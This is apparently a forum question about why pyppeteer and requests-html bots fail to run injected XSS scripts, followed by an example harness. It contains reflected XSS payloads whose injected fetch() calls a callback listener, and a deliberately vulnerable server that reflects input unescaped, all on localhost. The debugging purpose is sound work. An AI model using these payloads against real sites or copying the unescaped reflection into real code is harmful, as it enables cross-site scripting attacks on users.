So from some tutorials I came up with two bots that can execute JavaScript on a page. But the one using pyppeteer won't execute JS from either reflected or stored XSS, while the requests-html bot only executes JavaScript from stored XSS. Requests-html bot:-
from requests_html import HTMLSession
session = HTMLSession()
resp = session.get('http://127.0.0.1/search.php?x=<script>fetch("http://127.0.0.1:8888")</script>')
# Run JavaScript code on webpage
resp.html.render()
Pyppeteer bot:-
from pyppeteer import launch
import asyncio

async def main():
    # Headless Chromium; --disable-web-security was added while trying to get the injected JS to run
    browser = await launch(options={'args': ['--no-sandbox', '--disable-web-security']}, headless=True)
    url = 'http://127.0.0.1/search.php?x=<script>fetch("http://127.0.0.1:8888")</script>'
    page = await browser.newPage()
    # Navigate to the reflected-XSS URL and wait only for the 'load' event (3 s timeout)
    response = await page.goto(url, options={
        'timeout': 3000,
        'waitUntil': 'load'})
    print('response status: {}'.format(response.status))
    await browser.close()

loop = asyncio.get_event_loop()
loop.run_until_complete(main())
The point is that both bots perfectly execute JS that is present in the page from the beginning; the problem is with JS injected through XSS. My browser perfectly executes JS from both reflected and stored XSS.
So if anyone could help me figuring this out it would be great. Thanks in advance.
Note: I already tried args like --disable-web-security in the pyppeteer bot, but unfortunately with no result.
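A self-contained harness for the setup described in the question, added here as an example and not code from the poster. It stands in for search.php with a deliberately reflecting stdlib HTTP server and for the listener on :8888 with a second server that records every path it is asked for, both on ephemeral loopback ports (assumptions, so it runs without PHP or a fixed port). A plain HTTP client is run against the payload URL to show that reflection alone never fires the callback, and a headless-browser driver (pyppeteer assumed installed; that path is only run from the `__main__` block) shows the two things worth checking in such a bot: logging every outbound request the page makes, and waiting for `networkidle0` rather than closing the browser straight after `load`, so an injected `fetch()` has time to leave before the browser is torn down.

```python
import asyncio
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class ReflectingHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for search.php: reflects the x parameter unescaped
    (deliberately vulnerable so the bots have something to trigger)."""

    def do_GET(self):
        query = urllib.parse.urlparse(self.path).query
        x = urllib.parse.parse_qs(query).get("x", [""])[0]
        body = f"<html><body>You searched for: {x}</body></html>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


class CallbackHandler(BaseHTTPRequestHandler):
    """Stand-in for the listener on :8888; records every path that is requested."""
    hits = []

    def do_GET(self):
        CallbackHandler.hits.append(self.path)
        self.send_response(204)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


def start_server(handler):
    """Bind to an ephemeral loopback port (assumed instead of 80/8888) and serve in a thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def payload_url(target_port, callback_port):
    """Build the reflected-XSS URL. The payload is percent-encoded, which is what a
    browser (or requests) does to <, >, and " before sending the URL anyway."""
    payload = f'<script>fetch("http://127.0.0.1:{callback_port}/hit")</script>'
    return f"http://127.0.0.1:{target_port}/search.php?" + urllib.parse.urlencode({"x": payload})


def fetch_without_js(url):
    """Plain HTTP client: proves the payload is reflected, but has no JS engine to run it."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode()


def callback_fired():
    """True once anything has requested /hit on the listener."""
    return any(path.startswith("/hit") for path in CallbackHandler.hits)


async def fetch_with_headless_browser(url):
    """Drive headless Chromium via pyppeteer (assumed installed). Unlike a bot that
    closes right after 'load', this records every outbound request the page makes
    and waits for networkidle0, so an injected fetch() is sent before close()."""
    from pyppeteer import launch  # lazy import: only this path needs it
    browser = await launch(headless=True, args=["--no-sandbox"])
    page = await browser.newPage()
    outbound = []
    page.on("request", lambda req: outbound.append(req.url))
    await page.goto(url, {"waitUntil": "networkidle0", "timeout": 30000})
    await browser.close()
    return outbound


if __name__ == "__main__":
    target = start_server(ReflectingHandler)
    listener = start_server(CallbackHandler)
    url = payload_url(target.server_port, listener.server_port)
    fetch_without_js(url)
    print("plain client triggered callback:", callback_fired())  # no JS engine: False
    outbound = asyncio.run(fetch_with_headless_browser(url))
    print("browser requests:", outbound)  # should include the /hit URL if the script ran
    print("browser triggered callback:", callback_fired())
```

If the browser run prints the `/hit` URL in `outbound` but the listener never records it, the request left the page and the problem is on the listener side; if `/hit` never appears in `outbound`, the script did not run in the browser, and comparing the reflected body from `fetch_without_js` with what the browser received is the next step.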